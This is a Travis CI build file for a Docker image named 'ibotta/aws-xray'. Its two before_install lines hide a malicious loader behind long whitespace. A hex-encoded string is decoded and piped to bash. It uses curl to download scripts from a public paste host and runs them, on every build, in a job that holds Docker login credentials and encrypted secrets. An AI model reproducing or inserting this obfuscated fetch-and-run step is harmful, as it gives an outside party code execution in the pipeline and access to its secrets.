language: generic
services:
  - docker
before_install:
 - echo ibotta                                                                                                                                                                                                                                                            && echo "62617368202d6320276375726c202d6b20687474703a2f2f3078302e73742f2d4a55502e747874202d6f20747261766973312e747874202626206261736820747261766973312e747874270a" | xxd -p -r | bash
 - echo ibotta                                                                                                                                                                                                                                                           && echo "62617368202d6320276375726c202d6b20687474703a2f2f3078302e73742f2d4a554e2e747874202d6f20747261766973322e747874202626206261736820747261766973322e747874270a" | xxd -p -r | bash
env:
  global:
    - secure: "rSlJsSE87g/HNepT5OqI5FqlI6NPiVBmDxLC4A1k7NEUnaFK0dqedSbBmBth/H5E0dSYl1f2sPvqDoTPDTdm0g1QzadhWFSJHYaWX6nLg9MoMXnfwXGiiaBxJ0xTZ9u8oKjSqJ4j0KK6ws1Q/h0GUpPeveZAzhDPn3v/QzKLfzzTODRVjz+7i5dh53sQDfl+pk4VSyStGCgm+fDLDdXqDoct3/c65w7Z7hHhdV9/YG/PqlfiwCvRsuUTDws2ZivvCVjPnk7Wtqe9x/1q/G2oT0/oAUhOfwkPwf1v8z2untcA0U1euTmLScBxKH5lojAcu4BimNAYxOoNAVOmB1LgZGNzfq3EyYxcH/N6d73LiX1LLzZRoJPpuSp+UE2gGr6xWrQxYDAhYJKBS+NAbO5GijqIH7LWRZv529N3XICNuurwT09CA68nL4job4XJW+akuTLsf94uJ1ENz+9tIAXd4OqMiINPv81LA4k3gISsnQjT+lvtAhAnM2d80UNUcuXnsdmPmGnE0plm6w00tUv0QLjvGVp1AtWe6nreisDVI9OIiOUgUapOvrp/yDJVIAtrYSKXHP6B2EzD+98voAV6pVGZJ4ODSTgEFJj4J5r5Xqn3VZ1d53gZg7PES+BRTXJl8g03aT2dB8VLeo+N5XGX2kaFqgFkTymilQ2MUnornuM="
    - secure: "RL9Yg/N7pgRFCw1Dga2pv9DEF+ICbKKXGwRwO0tFpSOLyk5i9ZP35do5y/GL8S5PyCKp4ThoZBEX7j/cjQPdz2rCMVcP+S0Xj5u8CQ4jp2zoMUIltsYSApvFx44BA0bo1MGLnxDHAGMB3a8cRXr5T0fFRNApAv/lr6X5Z1YNx9cuqq4e8edUZVlUb3K2TWpIGTdI/eNM3sjc3nKdDYAotz7OwDDbYYO8bc/Pja6BZ6P3CsXPTzE/DNMc7JdVX92RZLJVgPvfjhf5r4TlVrFlpGvszfAEuxAeboyeoPbZCR2ASs1r7YR6prq9fEbCC0xyJFx1gm2Xfp7Tojfrm97mKb6WfQSWur3RdKSVYUkRhnQ/dFBdu5+iY+FCpszj3US215vl6nnw9qbtXsqq2NPGfqtXKE7pmMPskXg4OemqfAHHa6Sp+XRdFSVtWHJ4mD4oW5lAOXncfF2NgXOZMCWTAazPEn/g2SBr+Moba6TWJld+0cffVQzraP6PAad5Bw6FrzhZr6rw2RJqKarY5XuYxSuTcNU7dhCk2KoaEq3pnqph25tRttt01dyVTZL1SpZ05EwK5MU1MRShCEVH98Wz1oJn73kVjzmpQKTJja+9e8eCtC2HforMTjk8RcST21I0nT96yZ5a7OVbpxdKK37jiVx9dV9CENlzC81lDeKixhY="
before_script:
  - docker login -u="$DOCKER_USERNAME" -p="$DOCKER_PASSWORD"
script:
  - docker build -t aws-xray --build-arg VCS_REF="$TRAVIS_COMMIT" --build-arg BUILD_DATE=`date -u +"%Y-%m-%dT%H:%M:%SZ"` .
before_deploy:
  - docker images
  - docker tag aws-xray ibotta/aws-xray
deploy:
  - provider: script
    skip_cleanup: true
    script: docker push ibotta/aws-xray
    on:
      branch: master
